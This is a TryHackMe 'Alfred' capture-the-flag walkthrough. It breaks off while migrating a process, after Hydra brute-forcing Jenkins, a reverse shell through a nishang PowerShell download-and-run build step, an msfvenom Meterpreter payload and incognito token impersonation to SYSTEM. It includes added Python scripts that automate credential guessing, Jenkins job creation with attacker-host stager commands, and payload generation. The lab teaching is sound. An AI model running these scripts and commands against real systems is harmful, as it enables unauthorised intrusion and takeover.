![[alfred 2.png]]

# TryHackMe Walkthrough CTF

Part of the **Offensive Pentesting** learning path.

## Room Link: https://tryhackme.com/r/room/alfred

## Initial Access

Initial Nmap scan.

```bash
root@ip-10-10-244-40:~# nmap -T4 -n -sC -sV -Pn -p- 10.10.175.217
Starting Nmap 7.60 ( https://nmap.org ) at 2024-11-12 04:57 GMT
Nmap scan report for 10.10.175.217
Host is up (0.00057s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2024-11-11T04:53:01
|_Not valid after:  2025-05-13T04:53:01
|_ssl-date: 2024-11-12T05:09:10+00:00; -2s from scanner time.
8080/tcp open  http          Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 02:BB:32:CE:1B:73 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
```

**How many ports are open? (TCP only)**

From our initial scan we can see there are a few interesting things to take note of. Firstly, three TCP ports are open: 80, 3389 and 8080 (`-p-` scanned all 65535, and the remaining 65532 were filtered). We know this is a Windows machine from the service fingerprinting (`Service Info: OS: Windows`) and from Microsoft Terminal Services (RDP) listening on Port 3389; the RDP certificate's common name also leaks the hostname, `alfred`. We also see that the *TRACE* HTTP method is allowed on the IIS server on Port 80. On its own that is only an information leak, but it is the precondition for **Cross-Site Tracing (XST)**: a TRACE request echoes the full request back to the caller, headers included, so script injected through a **Cross-Site Scripting (XSS)** flaw can use it to read cookies and Authorization headers that the `HttpOnly` flag would otherwise keep out of reach. OWASP's write-up is linked below.
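The first-read triage above (count the open ports, spot RDP, spot the risky TRACE method) is easy to do by eye on three ports and tedious on thirty. The following is an added example, not part of the original walkthrough or of nmap itself: a small parser for nmap's normal output that attaches NSE script lines to the port they belong to and produces the same findings as data. The embedded sample is a trimmed copy of the scan output shown above.

```python
import re
from dataclasses import dataclass, field

# Trimmed copy of the scan output from this write-up, used as sample input.
SCAN = """\
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
3389/tcp open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=alfred
|_ssl-date: 2024-11-12T05:09:10+00:00; -2s from scanner time.
8080/tcp open  http          Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
MAC Address: 02:BB:32:CE:1B:73 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
"""

# "80/tcp   open  http   Microsoft IIS httpd 7.5" -> number, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE output lines start with "|" or "|_"
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE lines belonging to this port


def parse_nmap(text: str) -> list:
    """Turn nmap 'normal' output into Port records. Script lines are attached to
    the port they follow; host-level script output (after 'Host script results:')
    is dropped because it belongs to no port."""
    ports, current = [], None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            current = Port(int(m[1]), m[2], m[3], m[4], m[5].strip())
            ports.append(current)
            continue
        s = SCRIPT_RE.match(line)
        if s:
            if current is not None:
                current.scripts.append(s[1].strip())
        elif line:
            current = None  # any other non-empty line ends the port table
    return ports


def open_ports(ports: list) -> list:
    return [p for p in ports if p.state == "open"]


def findings(ports: list) -> list:
    """The observations made in the text above, as (port, note) pairs."""
    notes = []
    for p in open_ports(ports):
        if p.service == "ms-wbt-server":
            notes.append((p.number, "RDP exposed; host is Windows"))
        if any("risky methods" in s and "TRACE" in s for s in p.scripts):
            notes.append((p.number, "HTTP TRACE enabled; test for cross-site tracing"))
        if any(s.startswith("http-robots.txt") for s in p.scripts):
            notes.append((p.number, "robots.txt present; read it for hidden paths"))
    return notes


if __name__ == "__main__":
    ports = parse_nmap(SCAN)
    print(f"{len(open_ports(ports))} open TCP ports")
    for number, note in findings(ports):
        print(f"  {number}: {note}")
```

For anything beyond a quick look, run nmap with `-oX` and parse the XML instead; the normal-output format is for humans and nmap does not promise to keep it stable.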
https://owasp.org/www-community/attacks/Cross_Site_Tracing

Visiting the webpage hosted on Port 80 we are greeted with what appears to be an obituary for Batm- I mean Bruce Wayne, who is definitely just a billionaire and not the caped crusader. Let's see what is being hosted on Port 8080.

![[webpage.png]]

This is more like it: we are redirected to a login page for an application called **Jenkins**. That is worth pausing on, because Jenkins is a CI/CD server whose whole job is to run build commands on its host, so a login here is one step away from code execution.

![[login.png]]

Having no other clues to go off, my first idea was to attempt to brute force the login page using **Hydra**. We know that *alfred* appears to have an account due to the email contact listed on the initial webpage. To confirm what form of request we will be making to the login page we will use **BurpSuite** to intercept the login request.

![[burp.png]]

We can see the request being made: a POST to `/j_acegi_security_check` carrying the fields `j_username`, `j_password`, `from` and `Submit`. Hydra's `http-post-form` module takes three colon-separated parts: the path, the POST body with `^USER^` and `^PASS^` placeholders, and a string that appears only in a *failed* response ("Invalid username or password" here). `-s 8080` sets the port and `-f` stops after the first valid pair. First attempt, with the **alfred** username:

```bash
root@ip-10-10-244-40:~# hydra -s 8080 -l alfred -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/common-passwords-win.txt 10.10.175.217 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in: Invalid username or password' -f
```

This ended up failing unfortunately, so I switched to a username list as well as a password list to see if we could get a valid logon pair. I am using the `top-usernames-shortlist.txt` and the `common-passwords-win.txt` files from SecLists as my username and password files respectively.
```shell
root@ip-10-10-244-40:# hydra -s 8080 -L /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/common-passwords-win.txt 10.10.175.217 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in: Invalid username or password' -f
Hydra (http://www.thc.org/thc-hydra) starting at 2024-11-14 03:18:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 425 login tries (l:17/p:25), ~27 tries per task
[DATA] attacking http-post-form://10.10.175.217:8080/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in: Invalid username or password
[8080][http-post-form] host: 10.10.175.217   login: admin   password: admin
[STATUS] attack finished for 10.10.175.217 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-11-14 03:18:10
```

**What is the username and password for the login panel? (in the format username:password)**

Looks like we have our pair with `admin:admin`, so that's good to see. We probably didn't need Hydra for this one: `admin:admin` is the first thing to try by hand on any admin panel. It is worth being precise about why it worked, though. Jenkins does not ship with a default `admin:admin` login; since Jenkins 2.0 the setup wizard generates a random initial admin password (written to `secrets/initialAdminPassword`) and makes you choose your own. So this is a weak password somebody set, not a vendor default, and it is exactly the kind of thing a short credential list catches in seconds. Either way it is never a bad thing to get some Hydra practice in.

![[alf4.png]]

We have successfully logged into the Jenkins admin panel. Our next step is to use functionality within Jenkins that will allow us to execute commands on the server and get a reverse shell. Jenkins hands us this on a plate: a freestyle project can have an "Execute Windows batch command" build step, and whatever we put there runs on the server under the account the Jenkins service runs as. The instructions in the walkthrough point us to a specific PowerShell script, `Invoke-PowerShellTcp.ps1` from the Nishang framework, that we will download to our attacker machine and serve over a web server using Python. We will then enter a command into a Jenkins build step which downloads and executes our PowerShell script on the server and creates a reverse shell connecting back to our attacking machine.
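Hydra decides success by the absence of the failure string, which depends on it following the redirect Jenkins sends after a login attempt. The following is an added example, not part of the original walkthrough or of Hydra or Jenkins: it sends the same POST the Burp capture shows and classifies the result from the redirect target instead, which is the stricter signal. Jenkins answers a bad login with a 302 to `/loginError` (the page behind it is what contains "Invalid username or password"); a good login is a 302 to the `from` target. The host, port and credential lists in `main` are assumptions for illustration.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

LOGIN_PATH = "/j_acegi_security_check"   # the form action captured in Burp
FAIL_MARKER = "Invalid username or password"  # Hydra's failure string


def login_request(base: str, user: str, password: str) -> urllib.request.Request:
    """Build the same POST the login form sends (fields from the Burp capture)."""
    body = urllib.parse.urlencode({
        "j_username": user,
        "j_password": password,
        "from": "/",
        "Submit": "Sign in",
    }).encode()
    return urllib.request.Request(base.rstrip("/") + LOGIN_PATH, data=body, method="POST")


def classify(status: int, location: Optional[str], body: str) -> bool:
    """True when the credential pair is valid.
    Failure: 302 whose Location ends in /loginError (or, if redirects were
    followed, a 200 page containing FAIL_MARKER). Success: a 302 anywhere else."""
    if location is not None:
        return not location.rstrip("/").endswith("/loginError")
    return status == 200 and FAIL_MARKER not in body


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface 3xx responses as HTTPError instead of following them,
    so the Location header is available to classify()."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def try_pairs(base: str, users, passwords, stop_on_first: bool = True) -> list:
    """Try every user/password combination; stop_on_first mirrors hydra -f."""
    opener = urllib.request.build_opener(NoRedirect)
    found = []
    for user in users:
        for password in passwords:
            try:
                resp = opener.open(login_request(base, user, password), timeout=10)
                status, location = resp.status, resp.headers.get("Location")
                body = resp.read().decode(errors="replace")
            except urllib.error.HTTPError as err:  # 302 lands here when not followed
                status, location, body = err.code, err.headers.get("Location"), ""
            if classify(status, location, body):
                found.append((user, password))
                if stop_on_first:
                    return found
    return found


if __name__ == "__main__":
    # Assumed target and a tiny constructed list; real runs read SecLists files.
    hits = try_pairs("http://10.10.175.217:8080", ["admin", "alfred"], ["admin", "password"])
    print(hits or "no valid pair")
```

Jenkins does not lock accounts by default, but on a real engagement this is still where you throttle: every attempt is logged on the server, and a noisy loop against a production CI server is what gets a pentest paused.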
Now I know that was a lot, but let's go ahead and see what it looks like when we do it step-by-step.

First, let's start off by downloading the PowerShell script from the GitHub repository it's hosted on.

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

From here, move it to the directory that you like and start a Python web server (`python3 -m http.server`) in that directory on whichever port you'd like. I just use the default 8000 port to make things easier.

![[alf5.png]]

Now we need to copy the command provided to us by the room author and modify it to fit our needs. Firstly, we need to change the download URL to our IP address and the port where the PowerShell script is being served by the Python HTTP server. Then we need to add our IP address and a port of our choosing for the reverse shell to connect back to; this is the port our Netcat listener will be waiting on. In my case I went with Port 1337 as you can see below. Start the listener with:

`nc -lvnp PORT`

(`-l` listen, `-v` verbose, `-n` no DNS lookups, `-p` port.) Note that Netcat is the *listener* here, not the reverse shell: the shell is the PowerShell script running on the target, which connects back to this port. Start the listener before you build the project, otherwise the connection has nowhere to land and the build just errors out.

![[alf6.png]]

Once we have the command modified to download the script from our machine and connect back to our machine on the port that our Netcat listener is waiting on, click "Apply" and "Save" and go back to the main page.

![[alf10.png]]

From the main admin panel, our next step is to build the project, which will execute the command we have entered and, *fingers crossed*, result in a reverse shell.

![[alf7.png]]

The command we entered successfully downloaded our script and ran it as the user account `bruce` on the system `ALFRED`. Looking good so far!

![[alf8.png]]

And there we have it! The command was a success and we received a reverse shell from `ALFRED` running under the `bruce` user account. Note that the build stays "in progress" for as long as our shell is alive, since the build step never returns; keep that in mind before you go cancelling builds later.

**What is the user.txt flag?**

Let's check out the `bruce` account's Desktop...that is usually where we can find a user.txt flag.

![[alf9 1.png]]

And voila! Looks like our intuition was correct. Our next step is to try and escalate our privileges on `ALFRED` using Metasploit.
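Everything done through the Jenkins web UI above (create a freestyle project, add an "Execute Windows batch command" step, save, build) is also reachable over the Jenkins REST API, which is how you would script it or repeat it for the second project in the next section. The following is an added example, not code from the walkthrough, the room or Jenkins: it builds the minimal `config.xml` for a freestyle job whose only build step is a `hudson.tasks.BatchFile`, creates it with `POST /createItem`, and triggers it with `POST /job/<name>/build`, fetching a CSRF crumb first when the server issues one. The two command builders produce the download-and-run one-liners in the same shape the room uses (nishang stager for the first job, plain file download for the msfvenom executable in the second); their exact wording, the attacker IP and the job names are this example's assumptions.

```python
import base64
import json
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET
from http.cookiejar import CookieJar


def build_job_config(command: str, description: str = "") -> bytes:
    """Minimal freestyle-project config.xml whose single build step is
    'Execute Windows batch command' (hudson.tasks.BatchFile) running COMMAND.
    ElementTree escapes &, < and > in the command for us."""
    project = ET.Element("project")
    ET.SubElement(project, "description").text = description
    ET.SubElement(project, "keepDependencies").text = "false"
    ET.SubElement(project, "properties")
    ET.SubElement(project, "scm", {"class": "hudson.scm.NullSCM"})
    ET.SubElement(project, "canRoam").text = "true"
    ET.SubElement(project, "disabled").text = "false"
    ET.SubElement(project, "triggers")
    ET.SubElement(project, "concurrentBuild").text = "false"
    step = ET.SubElement(ET.SubElement(project, "builders"), "hudson.tasks.BatchFile")
    ET.SubElement(step, "command").text = command
    ET.SubElement(project, "publishers")
    ET.SubElement(project, "buildWrappers")
    return ET.tostring(project, encoding="utf-8", xml_declaration=True)


def stager_command(attacker_ip: str, http_port: int, shell_port: int,
                   script: str = "Invoke-PowerShellTcp.ps1") -> str:
    """Job 1: fetch the nishang script from our HTTP server and call its
    reverse-shell function (wording assumed; same pattern as the room's)."""
    url = f"http://{attacker_ip}:{http_port}/{script}"
    return (f"powershell iex (New-Object Net.WebClient).DownloadString('{url}');"
            f"Invoke-PowerShellTcp -Reverse -IPAddress {attacker_ip} -Port {shell_port}")


def download_command(attacker_ip: str, http_port: int, exe: str) -> str:
    """Job 2: only download the msfvenom exe into the job workspace; it is
    launched from the shell we already hold so the first build stays alive."""
    url = f"http://{attacker_ip}:{http_port}/{exe}"
    return f"powershell \"(New-Object Net.WebClient).DownloadFile('{url}','{exe}')\""


class Jenkins:
    """Just enough of the Jenkins REST API: basic auth, optional CSRF crumb,
    create a job from config.xml, trigger a build."""

    def __init__(self, base: str, user: str, password: str):
        self.base = base.rstrip("/")
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(CookieJar()))
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        self.headers = {"Authorization": "Basic " + token}
        self._add_crumb()

    def _add_crumb(self):
        try:
            crumb = json.loads(self._request("GET", "/crumbIssuer/api/json").read())
            self.headers[crumb["crumbRequestField"]] = crumb["crumb"]
        except urllib.error.HTTPError as err:
            if err.code != 404:  # 404: CSRF protection is off, nothing to add
                raise

    def _request(self, method, path, data=None, content_type=None):
        req = urllib.request.Request(self.base + path, data=data, method=method, headers=self.headers)
        if content_type:
            req.add_header("Content-Type", content_type)
        return self.opener.open(req, timeout=15)

    def create_job(self, name: str, command: str) -> int:
        path = "/createItem?" + urllib.parse.urlencode({"name": name})
        return self._request("POST", path, build_job_config(command), "application/xml").status

    def build(self, name: str) -> int:
        return self._request("POST", f"/job/{urllib.parse.quote(name)}/build", b"").status  # 201 = queued


if __name__ == "__main__":
    # Assumed values: target, the admin:admin pair found above, our attacker IP.
    j = Jenkins("http://10.10.175.217:8080", "admin", "admin")
    j.create_job("stager", stager_command("10.10.2.79", 8000, 1337))
    print("build queued:", j.build("stager") == 201)
```

Run `nc -lvnp 1337` and `python3 -m http.server` in the script's directory before triggering the build, exactly as in the manual version. The whole point of the example is the one sentence it makes concrete: anyone with job-creation rights on Jenkins has command execution on the Jenkins host, which is why Jenkins admin credentials deserve the same protection as the servers it builds on.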
## Switching Shells

**What is the final size of the exe payload that you generated?**

Now we copy the msfvenom command provided to us by the author and modify it to set our attacker machine IP as LHOST and the port we want to receive a connection on as LPORT.

![[alf11.png]]

Msfvenom is Metasploit's payload generation tool. The command looks complicated at first, but once we understand the syntax and the flags it becomes much easier to read.

| **SWITCH** | **PURPOSE** |
| ---------- | ------------------------------------------ |
| -p | Specifying the payload type. |
| -a | Specifying the payload architecture. |
| -f | Specifying the payload format. |
| -o | Specifying the payload name and saving it. |

`LHOST=` and `LPORT=` are not switches but payload options, passed as `KEY=VALUE` after the payload name. There are some other helpful commands like `msfvenom --list formats` which will provide us with a list of all the available payload formats that we can choose from. The question asks for the file size because msfvenom prints it on the last line ("Saved as: ..." preceded by "Final size of exe file: N bytes"); `ls -l` on the output file gives the same number.

The listener side is Metasploit's `exploit/multi/handler`, configured with the same payload, host and port we baked into the executable:

```bash
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 10.10.2.79
LHOST => 10.10.2.79
msf6 exploit(multi/handler) >
```

We already have the port configured correctly (4444 is the handler's default), but if you set the `LPORT=` option to a different port when generating your msfvenom payload, make sure to change it to that port in the Metasploit payload options as well; the payload and the handler must agree on PAYLOAD, LHOST and LPORT or the connection will never complete. Then `run` (or `exploit -j` to keep it in the background) to start listening.
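The caveat above (payload and handler must agree on payload type, host and port) is the classic way this step goes wrong, so it is worth generating both from one set of values. The following is an added example, not part of the walkthrough or of Metasploit: it derives the `msfvenom` argument list and a matching `msfconsole` resource script from a single `(LHOST, LPORT)`, runs msfvenom if it is installed, and reports the payload size the room asks for. The IP, port and file names are assumptions; the `--platform windows` flag and `-a x86` mirror the 32-bit executable the room has you build.

```python
import os
import shlex
import shutil
import subprocess

PAYLOAD = "windows/meterpreter/reverse_tcp"


def msfvenom_argv(lhost: str, lport: int, out: str,
                  payload: str = PAYLOAD, arch: str = "x86", fmt: str = "exe") -> list:
    """Argument list for msfvenom; LHOST/LPORT are payload options (KEY=VALUE),
    the rest are switches as in the table above."""
    return ["msfvenom", "-p", payload, "-a", arch, "--platform", "windows",
            f"LHOST={lhost}", f"LPORT={lport}", "-f", fmt, "-o", out]


def handler_rc(lhost: str, lport: int, payload: str = PAYLOAD) -> str:
    """Resource script for `msfconsole -q -r handler.rc`: same payload, host and
    port as the executable, run as a background job that keeps listening."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        "exploit -j -z",
        "",
    ])


def payload_size(path: str) -> int:
    """The number the room asks for: the size of the generated file in bytes."""
    return os.path.getsize(path)


def generate(lhost: str, lport: int, out: str = "shell.exe", rc: str = "handler.rc") -> int:
    """Build the payload and write the matching handler script; returns the exe size."""
    argv = msfvenom_argv(lhost, lport, out)
    print("+", shlex.join(argv))
    if shutil.which("msfvenom") is None:
        raise SystemExit("msfvenom is not on PATH; install Metasploit first")
    subprocess.run(argv, check=True)
    with open(rc, "w") as fh:
        fh.write(handler_rc(lhost, lport))
    return payload_size(out)


if __name__ == "__main__":
    # Assumed attacker address; 4444 matches the handler default shown above.
    size = generate("10.10.2.79", 4444)
    print(f"final size of exe payload: {size} bytes; start the listener with: msfconsole -q -r handler.rc")
```

`ExitOnSession false` with `exploit -j -z` keeps the handler up after the first session, which matters here because the first Meterpreter session sometimes dies during migration and you want the re-run to land without reconfiguring anything.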
Now, there are a few different ways we could go about this next step, but the easiest for me was to again use the Jenkins project build functionality to download our msfvenom payload to the server and then execute it from our existing shell running under the `bruce` account.

Go ahead and create a **new** project in Jenkins. We need a second project because the original project's build is still running: it is hung on our reverse shell, and if we kill that build we lose the shell we need to launch the msfvenom payload. Once you have a new project created, copy the command provided by the room author and modify it with your attacker machine's IP. Make sure you have the name of your msfvenom payload spelled correctly and that you are running your Python HTTP server in the directory where the payload is located; the build console will show the download error if either is wrong.

![[alf12.png]]

Now, from our shell as `bruce`, we execute the msfvenom payload that the build just downloaded into the project workspace and hopefully receive a connection to our listener in Metasploit.

![[alf13 1.png]]

Yes! Looks like we configured the payload correctly and had our Metasploit options set correctly. Now we move on to privilege escalation...

![[alf14.png]]

## Privilege Escalation

The privilege escalation path in this room uses the token impersonation technique. In short: every process and thread on Windows carries an access token describing the account it runs as and the privileges it holds, and a process holding the right privilege (chiefly `SeImpersonatePrivilege`) can take a token belonging to another security context, such as a SYSTEM service, and run code under it. The room author provided some reading material if you are unfamiliar with this technique.

https://learn.microsoft.com/en-us/windows/win32/secauthz/access-tokens

https://www.exploit-db.com/papers/42556

Within Windows there is a laundry list of privileges that allow users to execute specific actions on the machine. However, a handful of these privileges can be abused by attackers to carry out malicious actions on the victim's machine. I provided some additional documentation and reading below from Microsoft and HackTricks to give you a better understanding of what this attack is leveraging.
https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/access-tokens

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege

The room author provides us with a list of some of the more commonly abused privileges, and they line up with the privileges we see listed on the HackTricks entry for token abuse. (The room writes the second one as "SeAssignPrimaryPrivilege"; the real constant, per the Microsoft page above, is `SeAssignPrimaryTokenPrivilege`.) Let's see if any of these privileges are assigned to the `bruce` user that we can take advantage of, using `whoami /priv` from our shell. A privilege shown as *Disabled* is still held by the token and can be enabled programmatically, so do not discount it.

![[alf15.png]]

Looks like there are a few of these listed privileges assigned to the `bruce` user. We are now tasked with loading `incognito` into Meterpreter, an extension that lists the tokens reachable from our process and lets us impersonate one. You can read more about incognito on OffSec's website.

https://www.offsec.com/metasploit-unleashed/fun-incognito/

```bash
C:\Program Files (x86)\Jenkins\workspace\project>exit
exit
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT SERVICE\AudioEndpointBuilder
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\PcaSvc
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\Winmgmt
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
No tokens available
```

Once we have incognito loaded and a list of the available tokens (`-g` lists them by group rather than by user), we can see that a `BUILTIN\Administrators` token is available for us to impersonate. Incognito splits what it finds into *delegation* tokens, which can be used to start processes and even authenticate to other hosts, and *impersonation* tokens, which are only good for local impersonation; a delegation token is the one we want. We impersonate it with the following command and confirm that it was successful by running `getuid` within Meterpreter.

```bash
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Note that impersonating the Administrators group token actually landed us as `NT AUTHORITY\SYSTEM`: the token incognito grabbed belongs to a SYSTEM service that is a member of that group. This worked because the account running Jenkins holds `SeImpersonatePrivilege`, which is the privilege token impersonation depends on. There is a catch, though: the impersonated token is attached to our current thread inside `seashell.exe`, a child of the hung Jenkins build. To keep SYSTEM in a process that will outlive that build, we migrate into one that already runs as SYSTEM. Display the running processes on `ALFRED` via Meterpreter by running the `ps` command and look for a process to migrate to. We are told to migrate to `services.exe`, but there are a few others we could theoretically choose.
```bash
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                  x64   0
 396   4     smss.exe                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 524   516   csrss.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 572   564   csrss.exe               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 580   516   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 608   564   winlogon.exe            x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 668   580   services.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 676   580   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 684   580   lsm.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 712   668   sppsvc.exe              x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 772   668   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 848   668   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 864   668   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 924   608   LogonUI.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 936   668   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 976   2744  SearchProtocolHost.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchProtocolHost.exe
 984   668   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1012  668   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1056  2744  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchFilterHost.exe
 1068  668   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1208  668   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1240  668   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1356  668   amazon-ssm-agent.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1436  668   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1460  668   LiteAgent.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
 1488  668   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1592  668   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1608  668   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1644  668   jenkins.exe             x64   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\jenkins.exe
 1712  668   svchost.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1832  1644  java.exe                x86   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\jre\bin\java.exe
 1844  668   Ec2Config.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1944  524   conhost.exe             x64   0        alfred\bruce                  C:\Windows\System32\conhost.exe
 2368  772   WmiPrvSE.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2744  668   SearchIndexer.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2860  524   conhost.exe             x64   0        alfred\bruce                  C:\Windows\System32\conhost.exe
 2868  2880  seashell.exe            x86   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\workspace\project\seashell.exe
 2880  2948  powershell.exe          x86   0        alfred\bruce                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
 2948  1832  cmd.exe                 x86   0        alfred\bruce                  C:\Windows\SysWOW64\cmd.exe
 3036  668   TrustedInstaller.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe

meterpreter >
```

Two things are visible in this listing. The chain `java.exe` (1832) → `cmd.exe` (2948) → `powershell.exe` (2880) → `seashell.exe` (2868) is our shell hanging off the Jenkins build, all 32-bit and all running as `alfred\bruce`, which is why killing that build would take our session with it. And `jenkins.exe` itself runs as `alfred\bruce`, i.e. the service was configured to run under a user account rather than a low-privilege service account, which is the misconfiguration behind this whole room.

Use the `migrate` command with the PID of the `services.exe` process and confirm that the migration was successful by running the `getpid` command.

```bash
meterpreter > migrate 668
[*] Migrating from 2868 to 668...
